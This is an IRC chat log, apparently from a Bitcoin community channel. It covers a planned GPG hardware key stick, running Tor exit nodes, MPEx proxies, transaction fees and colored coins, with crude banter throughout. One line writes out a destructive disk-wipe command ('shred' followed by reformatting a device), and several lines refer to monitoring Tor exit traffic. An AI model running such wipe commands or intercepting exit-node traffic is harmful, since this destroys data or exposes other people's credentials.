bigger stick. Oct 10 00:56:17 Cardano on a stick! Oct 10 00:57:08 another question you won't answer yet (even though potential investors would love to know), target release date? Oct 10 00:57:08 my solar storm has begun Oct 10 00:57:34 2013? 14? 15? Oct 10 00:57:54 well, not 13. Oct 10 00:58:31 midnightmagic mike_c MiningBuddy- mircea_popescu mius mixdio Oct 10 00:58:43 mike_c should be here before xmas, so you can all make nice gifts to peopkle. Oct 10 00:58:47 no way Oct 10 00:58:50 wow Oct 10 00:58:50 yup/ Oct 10 00:59:30 how much? Oct 10 00:59:47 he's not saying yet Oct 10 00:59:57 Good evening ! will these devices be assembled in Romania? Oct 10 01:00:18 bitesak they shall be assembled at a secret & undisclosed set of locartions Oct 10 01:00:19 made in notchina Oct 10 01:00:24 for teh obvious reasons. Oct 10 01:01:02 http://175btc.com/ Oct 10 01:01:05 Vexual nah, it's not oursourced. Oct 10 01:01:09 we're actually making it. Oct 10 01:01:14 wise Oct 10 01:01:16 mircea - you in the pool with those guys Oct 10 01:01:53 jborkl umm i can't read that stuff, what's it say ? Oct 10 01:02:07 I am just looking at the picture' Oct 10 01:02:16 lol. Oct 10 01:02:18 yeah. im the duck. Oct 10 01:04:54 I wonder why it is 3 white dudes and one mexican dude mining at a chinese pool? Oct 10 01:05:03 with martinis Oct 10 01:05:11 and a rubber ducky Oct 10 01:05:31 not a mexican, just a rich dude with a tan Oct 10 01:05:58 that one has the least amount of btc Oct 10 01:06:37 [HAVELOCK] [AM100] 12 @ 0.0088 = 0.1056 BTC [-] Oct 10 01:07:17 so it seems Oct 10 01:08:35 jborkl jcpham Jere_Jones Jezzz joesmoe joeykrim jordandotdev jurov Oct 10 01:08:36 lmao jborkl Oct 10 01:09:00 the mexican is there to bean flavour the sausage soup they're making. Oct 10 01:09:46 They are all staring at each other and appear to be wearing lipstick :/ Oct 10 01:10:08 ok, who p2pd in the pool Oct 10 01:10:44 at least it wasn't a whale taking a dump Oct 10 01:17:14 would one be able to order and pay via fiat or is this strictly through bitcoin ? Oct 10 01:18:32 lol Oct 10 01:18:49 [HAVELOCK] [AM100] 601 @ 0.00853068 = 5.1269 BTC [-] {10} Oct 10 01:20:16 bitesak bitcoin. Oct 10 01:21:06 this will help make GPG more accessible and usable Oct 10 01:22:22 hopefully. Oct 10 01:22:36 i would think you know, if anyone that groks gpg gives one to their numerous gfs Oct 10 01:22:40 gpg could take over the world. Oct 10 01:23:47 precisely, I was speaking about GPG with my gf and this would be a good christmas gift Oct 10 01:25:09 yeah cause very easy to use, very hard to fuck anything up. Oct 10 01:25:40 :) Oct 10 01:26:38 and thanks to Bitcoin_ Oct 10 01:26:42 http://forum.kncminer.com/album/4173-anyone-hashing-in-the-datacentre-yet Oct 10 01:26:44 anyone-hashing-in-the-datacentre-yet Oct 10 01:27:10 2 jupiters for 350gh - bam tearing it up Oct 10 01:29:25 howlong have those been up ? Oct 10 01:29:38 curious if anyone ran a knc thing for more than a week or so by now Oct 10 01:29:56 look for smoke signals Oct 10 01:36:06 [HAVELOCK] [AM1] 2 @ 0.94 = 1.88 BTC [+] Oct 10 01:38:12 mircea_popescu: so this is a simplified and bigger version of http://www.gnupg.org/howtos/card-howto/en/smartcard-howto-single.html ? Oct 10 01:39:26 as best i can see it has little in common really. Oct 10 01:40:15 need not go any further than http://www.gnupg.org/howtos/card-howto/en/smartcard-howto-single.html#id2507296 Oct 10 01:40:19 that thing's a joke, really. Oct 10 01:41:03 will the girlfriend christmas package include lingerie, your email and a digital camera? Oct 10 01:41:10 Vexual we're working on something. Oct 10 01:41:24 good, i like drama Oct 10 01:43:01 mircea_popescu: maybe, but there seem to be 4096 versions too, and can handle kakobreklas wish for programmability (which of course decreases security) Oct 10 01:43:40 which kinda is the point. Oct 10 01:44:08 anybody make one with a zapper? Oct 10 01:44:10 as best i can see the smartcard is a sort of fun and games project, let's play with smartcards. it doesn't have the critical features such as separation of key from slate. Oct 10 01:44:23 such as hardware rng, such as the zapper yes, Oct 10 01:44:35 it's a laundry list. Oct 10 01:44:53 only people I know who include the zapper are, well, classic NSA. and they don't have a retail store. Oct 10 01:45:09 they do, but they only sell to iran Oct 10 01:46:19 what's a zapper? Oct 10 01:46:37 cyanide pill? Oct 10 01:47:32 Vexual: if you were to introduce key importation, the zapper would have to come with cyanide. Oct 10 01:47:51 whereas the answer to the inquisitor's 'where are the other copies' is correctly 'nowhere.' Oct 10 01:48:13 what is zapper? Oct 10 01:48:34 rom write? Oct 10 01:48:37 the ability to destroy the key? Oct 10 01:48:46 bitesak: we have a winner. Oct 10 01:49:43 see 'How does it work ?' section 'D'. Oct 10 01:50:47 good night ! Oct 10 01:53:05 well, I get the point of the device, but no backup is a dealbreaker for me Oct 10 01:53:08 mircea_popescu: hmm.. but could gpg's smarcard api be used with cardano for signing/encryption instead of copying files? Oct 10 01:53:20 asciilifeform: you have not considered adding a display? it's the thing i like about trezor Oct 10 01:53:38 so that stuff to be signed can be verified right on the device Oct 10 01:53:44 FabianB perhaps. i'll have to look into that. Oct 10 01:53:50 jurov he tried, but couldn't get it past me. Oct 10 01:54:03 also how do you communicate with it? you will need some software on the host? Oct 10 01:54:13 pankkake: it's in tfa Oct 10 01:54:17 pankkake nah, just normal stick Oct 10 01:54:20 mircea and why not? Oct 10 01:54:21 add a discharge cap to smoke the usb hub just for fun Oct 10 01:54:30 jurov cause i'm that kind of asshole. Oct 10 01:55:33 oh, you put your thing it its filesystem. clever Oct 10 01:55:35 didn't you violate contract with this executive meddling? Oct 10 01:55:56 no. my contract clearly states all employees must have unprotected sex with me. Oct 10 01:55:59 it's written in blood. Oct 10 01:56:07 tansylvania style Oct 10 01:56:28 I guess you can write software using it, of course, but it's clever Oct 10 01:56:37 poor stanislav... Oct 10 01:56:56 pankkake yeah the idea is, you can make a simple bash script to backup sites Oct 10 01:57:05 without relying on any outside protection. Oct 10 01:57:09 that's a good usecase, you know ? Oct 10 01:57:27 [MPEX] [S.MPOE] 2750 @ 0.00085157 = 2.3418 BTC [+] {2} Oct 10 01:57:32 how would it work, to encrypt a, say, 4 GB file? Oct 10 01:58:09 the encrypt is not handled by the cardano Oct 10 01:58:16 decription admittedly may take a minute at that size. Oct 10 01:58:28 [MPEX] [S.MPOE] 3450 @ 0.00085214 = 2.9399 BTC [+] {2} Oct 10 01:58:30 oh I'm dumb. you only need the pubkey for that Oct 10 01:58:36 :p Oct 10 01:58:45 but yeah, the decryption then… Oct 10 01:59:02 it would have to work in a "streaming" way Oct 10 01:59:20 and I don't think you can do that with a filesystem Oct 10 01:59:20 why ? Oct 10 01:59:34 (why streaming) Oct 10 01:59:35 does the cardana have gigabytes of storage? Oct 10 01:59:41 cardano* Oct 10 02:00:04 C) Working slate ROM. This Flash ROM is removable, and may be inspected or replacedx by customers either before deploying the unit or at any point during. Oct 10 02:00:12 if it doesn't you can solder your own in. Oct 10 02:00:24 o wait. no need to solder, cause nsa made it replaceable. Oct 10 02:01:15 ROM is Read Only Memory right? so I don't get it Oct 10 02:01:46 it's the same thing you find if you crack open any usb stick Oct 10 02:02:04 I wouldn't call it ROM Oct 10 02:02:09 >< Oct 10 02:02:15 but then again you're french. Oct 10 02:02:16 cdr is rom Oct 10 02:02:25 well you're ROManian… Oct 10 02:02:29 mircea_popescu: really, what happens if i put on it 4GB file to decrypt? where will it put the decrypted file? Oct 10 02:02:50 jurov well hopefully it has a 8gb slate, it puts it right there Oct 10 02:03:01 pankkake no srsly, it's what they're called. Oct 10 02:03:11 especially if gpg compressed it while encrypting Oct 10 02:03:19 I guess (looking at https://en.wikipedia.org/wiki/Flash_memory) Oct 10 02:03:31 but you will confuse people. Flash memory could be clearer Oct 10 02:03:50 ram is volatile, rom is not volatile. it's what the words mean. Oct 10 02:04:00 if it confuses people it's because people gotta learn what the words mean. Oct 10 02:04:21 anyway, I think an optional, streaming interface would be good Oct 10 02:04:34 [HAVELOCK] [AM100] 26 @ 0.0089858 = 0.2336 BTC [+] {3} Oct 10 02:04:35 3 letter? didn't read, too long Oct 10 02:04:56 pankkake maybe, but it'd be a diff product. this one separates itself from computer when touching the key, Oct 10 02:05:09 so as to rpotect from a variety of snooping techniques such as diff analysis from the host. Oct 10 02:05:48 it doesn't have to be different - it would simply be another service provided by the device; and would probably provide less attack vectors than the filesystem Oct 10 02:06:10 I mean, it can perfectly provide both Oct 10 02:06:25 oh, and have you considered safely erasing decrypted stuff once it is used? Oct 10 02:06:48 jurov the writing scheme is most-used rather than least-used Oct 10 02:07:03 consequently, you can trash the bits yourself by repeatedly copying/deleting a file to it. Oct 10 02:07:15 jurov: there is actually a better way: use a one-time-encryption key for the filesystem. each time you reboot it, it is effectively erased Oct 10 02:07:26 pankkake it's never rebooted. Oct 10 02:07:37 then unmount/remount Oct 10 02:07:37 [HAVELOCK] [AM100] 43 @ 0.008989 = 0.3865 BTC [+] Oct 10 02:07:42 just forget the password Oct 10 02:07:58 something like that. Oct 10 02:08:17 call it solid state, it sounds more expensive than rom or flash Oct 10 02:08:19 hmmmm... cuz safely erasing today's wear-levelled flash memory is non-trivial endeavor Oct 10 02:08:34 it's less IO expensive than erasing the data (but more CPU expensive as anything written is encrypted) Oct 10 02:08:39 or you use something custom? Oct 10 02:08:43 jurov which is why this is optimised the opposite way. it will wear down the bits. Oct 10 02:08:52 yes, tis custom. Oct 10 02:09:57 custom how? Oct 10 02:10:09 custom as in, it optimises for maximum wear. Oct 10 02:10:23 as opposed to how commercial flash drioves work (optimised for least wear) Oct 10 02:10:55 doesn't really respond to the "is the decrypted data recoverable" Oct 10 02:11:03 ^this Oct 10 02:11:19 it does. if you are concerned about this point, copy a file repeatedly until the bits die, and so then it won't be. Oct 10 02:11:22 if you're not, you're not. Oct 10 02:11:57 that sucks, and as stated, you have ways to make the concern go away *and* not wear the thing Oct 10 02:12:18 sometime life sucks. Oct 10 02:13:18 your product is flawed, there are easy ways to fix it and yet… no? Oct 10 02:14:05 the product is fine. you have an issue being somehow convinced you can design stuff while simultaneously not having a clue what rom is. Oct 10 02:14:13 this issue is not of the world. Oct 10 02:15:11 and I'm only getting evasing responses now. pathetic Oct 10 02:15:18 mkay. Oct 10 02:15:35 associates seeking similar outcomes leaving earth Oct 10 02:15:59 Vexual: it's your brainwallet? Oct 10 02:16:09 whoops wrong window Oct 10 02:16:28 if it is he has no btc ;/ Oct 10 02:16:44 ASSOLE Oct 10 02:16:46 [MPEX] [S.MPOE] 1050 @ 0.00085235 = 0.895 BTC [+] Oct 10 02:19:34 heuristic outcomes Oct 10 02:20:18 nice. i couldnt think of a suitable h Oct 10 02:20:25 pankkake, we'll see when the design will come out... Oct 10 02:20:34 it's not hard to give clear answers Oct 10 02:20:38 if it really it will be required to run shred /dev/sdf; mkdosfs /dev/sdf every time Oct 10 02:20:54 then i guess bigger animals than us will start making fun of it Oct 10 02:21:05 jurov there's a lot of sales copy there but i dunno how it's supposed to work/be implemented. Oct 10 02:21:08 so i have no idea. Oct 10 02:21:27 "I don't know" is a better answer than "it's fine" when it's not Oct 10 02:21:56 pankkake listen man, sometimes you will confront this situation where your imagination does not meet reality. people will tell you this, you will have to somehow digest it. Oct 10 02:22:06 there's no way around it, and petulence certainly ain't it. Oct 10 02:23:14 whose petulance? Oct 10 02:23:49 the definition of petulence is "i've not done anything to date but i will declare your item "flawed" because i am upset that you don't agree with what i think is the case". Oct 10 02:23:59 again, if your product has no instand erase of its decrypted contents, it loses a great deal of attractivity - telling users they have to shred themselves is far away from the goal of having an easy secure device Oct 10 02:24:24 can you quote where this goal you imagine for me was stated ? Oct 10 02:25:22 yeah cause very easy to use, very hard to fuck anything up. Oct 10 02:25:52 hardly a goal. but anyway, let's go throuigh the thing to make sure we're all on the same page, har har. Oct 10 02:26:05 if you have remote control of the connected pc, but no physical control of the stick, Oct 10 02:26:10 and the worst thing is, it's not a big deal to fix. there is no reason to start going all like "it's not a problem" Oct 10 02:26:14 you can't read the deleted part of the work slate. Oct 10 02:26:31 if you have physical control of the stick, you can remove the working slate, but still can't read it, because it has a cypher. Oct 10 02:26:33 you can read the raw filesystem of usb sticks Oct 10 02:27:02 if you are real good and manage to extracrt the cypher out of the chip and decode the working slate, you might be able to read whatever's not been destroyed on the drive. Oct 10 02:27:30 the definitive protection to this is a) don't lose physical control of the stick and b) destroy the slate. Oct 10 02:27:49 this is how the thing is intended to work. there aren't and won't be unrelated cases glued on because people think they're cool. Oct 10 02:27:58 because this isn't a cool thing, this is a useful thing. Oct 10 02:28:02 no, you can simply read the whole filesystem silently, when it is plugged Oct 10 02:28:10 and you know this because ? Oct 10 02:28:20 because that's how USB Mass Storage works Oct 10 02:28:36 right-o. Oct 10 02:28:43 ok I should probably chime in here. Easy answer: Oct 10 02:28:56 we have a session block cipher key for working slate in SRAM Oct 10 02:29:10 bah ruining all my fun. Oct 10 02:29:11 asciilifeform: wow, so… that what I was proposing! Oct 10 02:29:39 see? don't deny the issue, especially if it is already fixed Oct 10 02:29:46 eh get out Oct 10 02:29:50 i gotta make this guy sign an nda. Oct 10 02:31:01 pankkake : did you read the "At the end of this procedure, the working slate will have been re-formatted, and will appear empty - as Cardano no longer possesses the old block-cipher key." part ? Oct 10 02:31:28 without saying much more, the quick answer is: if some part of the draft spec seems illogical / bizzare / 'couldn't physically wurk', the answer is generally 'the obvious fix.' Oct 10 02:31:50 no. I TL;DRed it. but that was no reason to say that my concern was invalid - it was valid, and actually taken care of Oct 10 02:32:00 which means it's invalid. Oct 10 02:32:40 ugh… Oct 10 02:34:14 sscience Oct 10 02:35:25 can i get a 9 pin plug instread of usb? :) Oct 10 02:35:56 you mean a 9 in plug? Oct 10 02:36:03 Vexual: for your VT-100? Oct 10 02:36:23 yeah im saving up for a new computer Oct 10 02:37:23 hey! my bitbet was accepted Oct 10 02:37:33 thrilling Oct 10 02:38:39 how did that happen! Oct 10 02:38:55 and i gave clear orders no futher bets to be accepted!!1 the entire system is breaking down! Oct 10 02:39:04 lel Oct 10 02:39:21 whats the bet? Oct 10 02:39:30 http://bitbet.us/bet/552/havelock-will-announce-us-restrictions-by-guy-fawkes/ Oct 10 02:39:32 BitBet - Havelock will announce US restrictions by Guy Fawkes Night Oct 10 02:40:13 it's en vogue these days Oct 10 02:40:59 are you the no nubs? Oct 10 02:41:36 not sure how to answer Oct 10 02:41:41 oh! Oct 10 02:41:42 lel Oct 10 02:41:44 no Oct 10 02:42:02 i thought you were asking if i didn't have any nubs Oct 10 02:42:03 while the "ASICMINER weekly dividend drops below 0.005 per share in 2013" was getting rejected it is now too late, as the last one was 0.004 Oct 10 02:42:49 http://www.washingtonpost.com/blogs/worldviews/wp/2013/10/09/oops-azerbaijan-released-election-results-before-voting-had-even-started/ Oct 10 02:42:49 Oops: Azerbaijan released election results before voting had even started Oct 10 02:42:56 hah Oct 10 02:43:42 private fibre Oct 10 02:43:43 speaking of Azerbaijan, has anyone here done the TOR exercise suggested in MP's comments? Oct 10 02:44:04 which exercise is that? Oct 10 02:44:57 lol azerbaijan govt is truely efficient. Oct 10 02:45:03 http://trilema.com/2013/dear-guardian-stop-being-retarded/#comment-95409 Oct 10 02:45:04 Dear Guardian : stop being retarded. pe Trilema - Un blog de Mircea Popescu. Oct 10 02:45:29 someone mentioned it earlier today Oct 10 02:46:30 given I know people who had police visits quickly after running exit nodes, I won't Oct 10 02:46:52 don't do it on a residential pipe. Oct 10 02:47:14 and probably don't do it on your name, but with some kind of legal shield Oct 10 02:47:16 [HAVELOCK] [VTX] 1 @ 0.36110131 BTC [+] Oct 10 02:47:20 I mean, legal entity Oct 10 02:47:22 more 802.11s! Oct 10 02:47:51 it is best done under the flag of an organization existing for some other not entirely related purpose. Oct 10 02:48:11 with the commander's approval, naturally Oct 10 02:48:33 or if you're a cheapo you can just rent an Amazon EC2 instance. Oct 10 02:48:42 they Officially love TOR. Oct 10 02:48:53 won't Amazon rat you out? Oct 10 02:49:13 last i checked tor exits were explicitly permitted in their TOS Oct 10 02:49:18 [HAVELOCK] [VTX] 2 @ 0.42999999 = 0.86 BTC [+] {2} Oct 10 02:49:19 [HAVELOCK] [HIM] 33 @ 0.11248786 = 3.7121 BTC [-] {8} Oct 10 02:49:27 the fact of them sneaking a peek at your results if they feel like it is another matter. Oct 10 02:49:58 having the server pulled off isn't the real concern, the real concern is them giving your personal info to the police Oct 10 02:50:06 asciilifeform don't you find that amazon love quite damning ? Oct 10 02:50:14 and if you diddle traffic in an easily detected way, TOR foundation will add your node to its blacklist. Oct 10 02:50:14 there are many other providers who explicitely say TOR is OK Oct 10 02:50:18 [HAVELOCK] [HIM] 22 @ 0.10165454 = 2.2364 BTC [-] {5} Oct 10 02:50:20 [HAVELOCK] [VTX] 2 @ 0.43 = 0.86 BTC [+] Oct 10 02:50:38 pankkake like who ? (i've not been watching this any) Oct 10 02:50:45 some others that automatically shut you down (I know one who monitors for both TOR and Freenet) Oct 10 02:51:03 there is no shortage of damning. TOR's authors really love it when you run it on VPS hosts, saves them some $ on running their own diddled nodes. Oct 10 02:51:20 [MPEX] [S.MPOE] 1000 @ 0.00085235 = 0.8524 BTC [+] Oct 10 02:51:45 https://trac.torproject.org/projects/tor/wiki/doc/GoodBadISPs Oct 10 02:51:56 I'm running a relay on an EDIS node Oct 10 02:52:13 Arvixe (hosting) Openly and respectfully state that while they dont permit a TOR exit on shared hosting accounts, you are very welcome to run one on a VPS account. Oct 10 02:52:16 nice. Oct 10 02:52:34 'shared hosting' typically means no persistent processes Oct 10 02:52:42 so, no IRC either, etc Oct 10 02:53:16 hehe, I remember when you could rent "shells" and the number of resident processes was limited Oct 10 02:53:47 for the same price you can probably get a dedicated server now Oct 10 02:54:19 my advice to anyone who does the exercise is to look up what happened to the Swedish fellow who did likewise and published the results in an academic paper. Oct 10 02:54:47 and then draw appropriate conclusions. Oct 10 02:55:12 you can kiss those 4 centibits goodbye nubbins Oct 10 02:55:26 anyway, the tor list of isps is a good source even if you don't care for TOR Oct 10 02:56:14 the TOR source is a good source even for those who don't care for TOR Oct 10 02:56:44 it is one thing to say 'gotta be a honeypot, bureaucrats wrote it' and another to see just how the pot is intended to function Oct 10 02:56:51 and under what conditions it is usable as something else. Oct 10 02:56:59 http://www.wired.com/threatlevel/2007/11/swedish-researc/ him? Oct 10 02:56:59 Tor Researcher Who Exposed Embassy E-mail Passwords Gets Raided by Swedish FBI and CIA | Threat Leve Oct 10 02:57:07 yes, him. Oct 10 02:57:30 no wait, the other ways around Oct 10 02:57:38 the tor project explicitely says you should not trust exit nodes Oct 10 02:57:59 it says quite a few things Oct 10 02:58:12 such as, for instance, that a healthy person should eschew Winblows Oct 10 02:58:25 words are cheap. Oct 10 02:58:42 TBB ships with HTTPS anywhere, not that it is enough… Oct 10 02:59:06 actually, even torbrowser on linux is quite risky Oct 10 02:59:20 unless you forbid any non-tor traffic, like Tails does Oct 10 03:00:25 anyone who even thinks of 'browser' when thinking about TOR, etc. is already in a state of damnation. Oct 10 03:01:04 what do you mean? Oct 10 03:02:15 refer to the 'dumb users' section of the latest TOR dirt leak (even if you believe that the 'leak' is disinfo, the section applies to most users.) Oct 10 03:02:49 so consider the case of a TORist who proceeds to log into gmail, etc. while on a circuit Oct 10 03:02:56 game over. Oct 10 03:03:16 or the similar case of 'cookies' enabled Oct 10 03:03:29 right Oct 10 03:04:15 that's why Tails is great: use it to do your thing and this only Oct 10 03:05:34 [HAVELOCK] [AM1] 2 @ 0.9530003 = 1.906 BTC [+] Oct 10 03:06:35 [HAVELOCK] [AM100] 42 @ 0.00866 = 0.3637 BTC [-] Oct 10 03:06:59 i was dreaming about a irc based exchange on the tor network Oct 10 03:07:36 [HAVELOCK] [AM1] 1 @ 0.9530002 BTC [-] Oct 10 03:08:29 hmm and you would put orders through bots? Oct 10 03:08:34 yea Oct 10 03:08:37 [HAVELOCK] [AM1] 1 @ 0.953 BTC [-] Oct 10 03:08:41 I like it - tor or not Oct 10 03:08:48 faster than any web on tor atleast Oct 10 03:09:05 assbot speaks mpex Oct 10 03:09:05 I don't like websites or browsers, so :) Oct 10 03:09:07 blastbob1 you are aware this is how mpex works yes ? Oct 10 03:09:24 :p Oct 10 03:09:25 heard some rumours yes Oct 10 03:09:55 http://trilema.com/2013/the-many-ways-available-for-talking-to-mpex/ Oct 10 03:09:56 The many ways available for talking to MPEx pe Trilema - Un blog de Mircea Popescu. Oct 10 03:10:02 there, spec. why live on rumors. Oct 10 03:11:40 [HAVELOCK] [AM100] 51 @ 0.00867 = 0.4422 BTC [+] Oct 10 03:12:05 Can you accually buy and sell with it also? Oct 10 03:12:33 yup Oct 10 03:13:07 $proxies Oct 10 03:13:08 pankkake: ["http://mpex.co", "http://mpex.ws", "http://mpex.bz", "http://mpex.coinbr.com", "http://mpex6.coinbr.com"] Oct 10 03:15:58 i hear rumours? Oct 10 03:16:00 http://www.youtube.com/watch?v=hJJnJJFCyl4 Oct 10 03:16:00 Awesome - Rumours - YouTube Oct 10 03:17:21 proxies? have places started blocking mpex? XD Oct 10 03:17:41 simply prepare for the worst Oct 10 03:17:50 ah Oct 10 03:18:59 most of those are offline Oct 10 03:19:01 proxies Oct 10 03:19:08 is that indented? Oct 10 03:19:12 intended Oct 10 03:19:16 i doubt Oct 10 03:19:17 mircea_popescu: I spot a kivy screenshot Oct 10 03:19:25 :) Oct 10 03:20:08 Vexual: not my bitcents! i'm in it to win it Oct 10 03:20:25 yes well you must have seen snl last week too nubbins Oct 10 03:20:38 sadly, no :( Oct 10 03:20:59 the thinking persons merican news and currnt affairs Oct 10 03:21:12 i thought that was the onion Oct 10 03:21:57 no thats just to confuse old people Oct 10 03:22:12 ah! i have so much to learn Oct 10 03:22:36 i get most of my news through the glorious red lens of the canadian broadcasting corporation Oct 10 03:23:11 the red lens is the bc bud? Oct 10 03:23:45 i was referring to their strong slant to the left Oct 10 03:24:08 although i think i recall that in other places red is the right-wing color of choice? Oct 10 03:24:16 hard to keep track Oct 10 03:24:47 Azelphur hm ? Oct 10 03:24:55 in your blog post Oct 10 03:24:57 I spy python+kivy Oct 10 03:25:01 o. Oct 10 03:25:22 http://trilema.com/wp-content/uploads/2013/03/mpex_droid.png Oct 10 03:25:36 yeh Oct 10 03:25:48 some people don't know the glory of perl Oct 10 03:27:04 you mean, the terribleness Oct 10 03:27:58 :p Oct 10 03:28:06 im in such a trollish mood today Oct 10 03:28:29 tell that to a t1000 terminator, theyre all perl Oct 10 03:29:08 i thought they were written in RPG IV Oct 10 03:32:08 you can run a kivy application on a desktop too? Oct 10 03:32:34 sure Oct 10 03:32:48 you can run anything on linux. Oct 10 03:32:52 that is what the word means. Oct 10 03:34:18 I knew it mostly as a way to write Android applications in Python. if it can run without the android crap, it's great Oct 10 03:35:21 i think it's pretty much useful as a way to write for smartphones, but it does run in linux. Oct 10 03:35:32 which means it can be run on the toaster oven or w/e. Oct 10 03:37:30 Vexual http://en.wikipedia.org/wiki/Pontiac_T1000 ? Oct 10 03:37:54 well I'm on a project where most of GUIs suck, and we only support one dead mobile platform. kivy was on our radars Oct 10 03:38:17 jesus that sounds bad. Oct 10 03:38:37 not really. we're like mpex, mostly CLIs :p Oct 10 03:38:43 also not actualy self aware Oct 10 03:39:46 aok Oct 10 03:41:14 looks like no java required for kivy on desktop. yay Oct 10 03:42:28 nope. it's a decent tool. Oct 10 03:50:18 [HAVELOCK] [AM100] 32 @ 0.00881 = 0.2819 BTC [-] Oct 10 03:50:35 http://en.wikipedia.org/wiki/List_of_films_that_most_frequently_use_the_word_%22fuck%22 Oct 10 03:50:47 apparently wikipedia has one good article on it. Oct 10 03:53:00 "This is a list of non-pornographic, English language films" Oct 10 03:53:39 FPM is a good unit Oct 10 03:54:45 there's also youtube videos with only the fucks Oct 10 03:55:27 the fuckdebit Oct 10 03:55:44 f/m^2 as the fucks accelerate Oct 10 03:56:14 https://www.youtube.com/watch?v=_jSMTcx69-Q Oct 10 03:56:14 Jay And Silent Bob Strike Back: The F*cking Short Version - YouTube Oct 10 04:02:42 english is so banal. i can only imagine what that'd have sounded like in romanian. Oct 10 04:03:33 indeed, I wonder if other language have such a popular curse worse Oct 10 04:04:56 word* Oct 10 04:05:01 https://www.youtube.com/watch?v=vM8Mq4yz2Hw (though the joke is also the translation) Oct 10 04:05:02 fuck you - YouTube Oct 10 04:05:47 m'embeterai Oct 10 04:05:49 lmao Oct 10 04:06:06 it's funny because it's true. French translations are pretty tame Oct 10 04:07:13 saperlipopette ! Oct 10 04:07:59 http://www.youtube.com/watch?v=RNOdcBUJ3eU Oct 10 04:08:00 injuraturi - YouTube Oct 10 04:08:05 this is one of the better romanian strings. Oct 10 04:08:18 interestingly, the chick is actually french and she doesn't speak romanian. learned it phonetically. Oct 10 04:08:49 nice Oct 10 04:09:44 (Marthe Felten) Oct 10 04:10:51 http://www.youtube.com/watch?v=n6dgOu6sj9Y Oct 10 04:10:52 Hercules Returns: "Testiculi's father".. Part 1 - YouTube Oct 10 04:11:21 huh, virtex is issuing debit cards now Oct 10 04:11:33 cool Oct 10 04:11:39 [HAVELOCK] [AM100] 26 @ 0.008989 = 0.2337 BTC [+] Oct 10 04:12:21 any updates from ukto regarding refunding the bugged fees? Oct 10 04:12:27 https://www.youtube.com/watch?v=zYoeBn247CU that movie is an insult goldmine and a classic Oct 10 04:14:41 [HAVELOCK] [AM100] 34 @ 0.009 = 0.306 BTC [+] {3} Oct 10 04:14:50 According to Pileggi, Scorsese cold-called the writer and told him, "I've been waiting for this book my entire life." To which Pileggi replied "I've been waiting for this phone call my entire life". Oct 10 04:20:50 I'm becoming addicted to zero fee transactions. it's like gambling except you eventually win Oct 10 04:26:20 coincontrol build is perfect for that Oct 10 04:26:39 you can easily add bloat btc to make it free Oct 10 04:26:51 or select apropriate input Oct 10 04:27:20 it's how I chose the amounts I bitbet usually, I take a full input :) Oct 10 04:28:15 it does have a cost tho Oct 10 04:28:16 you can do 1 satoshi tx and attach 100 btc to it for bloat and its free Oct 10 04:28:22 a satoshi saved is a satoshi earned Oct 10 04:28:23 in the sense that old coinbase are worth that many btcdays Oct 10 04:29:06 indeed. I was actually thinking of how a service could try to lower its fees by coinbase optimization Oct 10 04:29:53 have one big input of 1k btc and shave off btc Oct 10 04:30:03 change address always self Oct 10 04:30:21 if the change address is self, then it's still considered old? Oct 10 04:30:31 no Oct 10 04:30:35 nop Oct 10 04:30:49 that's why I thought of having multiple old coinbases, of many values Oct 10 04:31:01 just make it big enough Oct 10 04:31:03 1000 btc ages quickly Oct 10 04:31:21 oh, the bigger it is, the faster it ages? Oct 10 04:31:42 "btcdays" is the unit Oct 10 04:31:53 1 btc per day Oct 10 04:31:58 [HAVELOCK] [CFIG] 1 @ 0.13085 BTC [+] Oct 10 04:31:59 [HAVELOCK] [CBTC] 29800 @ 0.00018099 = 5.3935 BTC [-] {4} Oct 10 04:31:59 0.5 btc would take 2 days Oct 10 04:32:05 2 btc would take half a day Oct 10 04:32:29 I see. cool. I wasn't able to find a good documentation on the matter earlier Oct 10 04:33:12 ;;calc (60*60*24)/1000 Oct 10 04:33:12 86.4 Oct 10 04:33:23 looks like 86 seconds for a 1k Oct 10 04:34:05 a sendtomany every block easy Oct 10 04:40:06 [HAVELOCK] [AM100] 14 @ 0.008821 = 0.1235 BTC [-] Oct 10 04:40:13 hows the 250k block gonna work in 5 years? Oct 10 04:41:11 plebs will only be able to send coins using services affiliated with mining conglomerates? Oct 10 04:42:47 pretty much Oct 10 04:45:17 cool, im gonna buy noumea so i can learn improper french properly Oct 10 04:49:15 [HAVELOCK] [VTX] 5 @ 0.43 = 2.15 BTC [+] Oct 10 04:52:04 ;;bc,stats Oct 10 04:52:06 Current Blocks: 262659 | Current Difficulty: 1.8928124928103292E8 | Next Difficulty At Block: 264095 | Next Difficulty In: 1436 blocks | Next Difficulty In About: 1 week, 1 day, 1 hour, 37 minutes, and 4 seconds | Next Difficulty Estimate: 220202781.137 | Estimated Percent Change: 16.33629 Oct 10 04:58:24 [HAVELOCK] [AM100] 85 @ 0.009 = 0.765 BTC [+] {2} Oct 10 05:02:22 anyone feel like fielding a couple of questions about coloured coins? Oct 10 05:07:36 Anyone know what's going on whty Ukyo lately? Oct 10 05:07:51 s/whty/with Oct 10 05:09:14 hes maybe moving to okinawa Oct 10 05:09:35 [HAVELOCK] [AM100] 40 @ 0.009 = 0.36 BTC [+] Oct 10 05:10:14 waiting on a visa for his cat Oct 10 05:10:47 He seems to be MIA for over a week now. Oct 10 05:10:47 biosecurity is pretty big in japan Oct 10 05:13:37 ;;seen ukyo Oct 10 05:13:37 ukyo was last seen in #bitcoin-assets 1 week, 3 days, 20 hours, 26 minutes, and 51 seconds ago: So speculate all you want. :) Oct 10 05:13:41 ;;seen ukto Oct 10 05:13:41 ukto was last seen in #bitcoin-assets 1 week, 2 days, 17 hours, 12 minutes, and 18 seconds ago: yeah. there are easier ways. :) Oct 10 05:13:42 after an admittedly short search, i wasn't able to find a whole lot of technical info on the theory behind colored coins, but i found this odd snippet in a paper: Oct 10 05:13:43 hm Oct 10 05:14:00 im joking people, hes moving to tokyo Oct 10 05:14:02 "A valid Bitcoin transaction which does not follow the special colored format, will be recognized by the Bitcoin network, but not as a legitimate color-preserving transaction by the colored coin network. The color of these coins will be lost, and hence users and software clients need to be careful to avoid doing this and losing their value." Oct 10 05:14:07 cat is true Oct 10 05:14:36 but why the fuck would you design it in such a way that the "color of the coins" (i.e. your shares in company x or whatever) could ever be lost? Oct 10 05:14:40 it boggles me Oct 10 05:14:49 otherwise its racist? Oct 10 05:15:18 couloured coins isn't even a thing Oct 10 05:15:23 that's it Oct 10 05:15:29 it's because shit like i pasted doesn't make sense Oct 10 05:15:44 and things that don't make sense don't get implemented Oct 10 05:15:52 why even use the bitcoin blockchain? Oct 10 05:16:01 hash power! Oct 10 05:16:05 